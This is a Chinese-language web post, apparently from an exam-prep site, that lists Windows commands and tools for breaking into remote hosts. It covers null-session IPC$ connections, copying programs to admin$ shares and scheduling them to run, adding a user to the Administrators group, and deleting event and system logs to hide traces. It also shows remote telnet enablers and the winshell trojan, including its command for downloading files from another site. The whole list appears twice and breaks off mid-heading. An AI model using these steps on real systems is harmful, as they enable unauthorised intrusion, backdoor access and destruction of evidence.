考試大軟考站推薦:網絡管理員和黑客都應知道的幾條命令
常用的幾條NET命令:
(與遠程主機建立空管連接) net use file://IP/地址\ipc$ "" /use:""
(以管理員身份登錄遠程主機) net use file://IP/地址\ipc$ "密碼" /use:"Administrator"
(傳送文件到遠程主機WINNT目錄下)copy 本機目錄路徑\程序 file://IP/地址\admin$
(查看遠程主機時間) net time file://IP/地址
(定時啟動某個程序) at file://IP/地址 02:18 readme.exe
(查看共享) net view file://IP/地址
(查看netbios工作組列表) nbtstat -A IP地址
(將遠程主機C盤映射為自己的F盤) net use f: file://IP/地址\c$ ""/user:"Administrator"
(這兩條把自己增加到管理員組): net user 用戶名 密碼 /add
net localgroup Administrators 用戶名 /add
(斷開連接) net use file://IP/地址\ipc$ /delete
掃尾:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
一、netsvc.exe
下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:
netsvc /list file://IP/地址
netsvc schedule file://IP/地址 /query
netsvc file://IP/地址 schedule /start
二、OpenTelnet.exe
遠程啟動主機的Telnet服務,并綁定端口到7878,例如:
OpenTelnet file://IP/地址 用戶名 密碼 1 7878
然后就可以telnet到主機的7878端口,進入DOS方式下:
telnet IP地址 7878 三、winshell.exe
一個非常小的木馬(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>后,可打下面的命令:
p Path (查看winshell主程序的路徑信息)
b reBoot (重新啟動機器)
d shutDown (關閉機器)
s Shell (執(zhí)行后你就會看到可愛的“C:\>”)
x eXit (退出本次登錄會話,此命令并不終止winshell的運行)
CMD> http://.../srv.exe (通過http下載其他網站上的文件到運行winshell的機器上)
四、3389登陸器,GUI方式登錄遠程主機的
常用的幾條NET命令:
(與遠程主機建立空管連接) net use file://IP/地址\ipc$ "" /use:""
(以管理員身份登錄遠程主機) net use file://IP/地址\ipc$ "密碼" /use:"Administrator"
(傳送文件到遠程主機WINNT目錄下)copy 本機目錄路徑\程序 file://IP/地址\admin$
(查看遠程主機時間) net time file://IP/地址
(定時啟動某個程序) at file://IP/地址 02:18 readme.exe
(查看共享) net view file://IP/地址
(查看netbios工作組列表) nbtstat -A IP地址
(將遠程主機C盤映射為自己的F盤) net use f: file://IP/地址\c$ ""/user:"Administrator"
(這兩條把自己增加到管理員組): net user 用戶名 密碼 /add
net localgroup Administrators 用戶名 /add
(斷開連接) net use file://IP/地址\ipc$ /delete
掃尾:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
一、netsvc.exe
下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:
netsvc /list file://IP/地址
netsvc schedule file://IP/地址 /query
netsvc file://IP/地址 schedule /start
二、OpenTelnet.exe
遠程啟動主機的Telnet服務,并綁定端口到7878,例如:
OpenTelnet file://IP/地址 用戶名 密碼 1 7878
然后就可以telnet到主機的7878端口,進入DOS方式下:
telnet IP地址 7878 三、winshell.exe
一個非常小的木馬(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>后,可打下面的命令:
p Path (查看winshell主程序的路徑信息)
b reBoot (重新啟動機器)
d shutDown (關閉機器)
s Shell (執(zhí)行后你就會看到可愛的“C:\>”)
x eXit (退出本次登錄會話,此命令并不終止winshell的運行)
CMD> http://.../srv.exe (通過http下載其他網站上的文件到運行winshell的機器上)
四、3389登陸器,GUI方式登錄遠程主機的

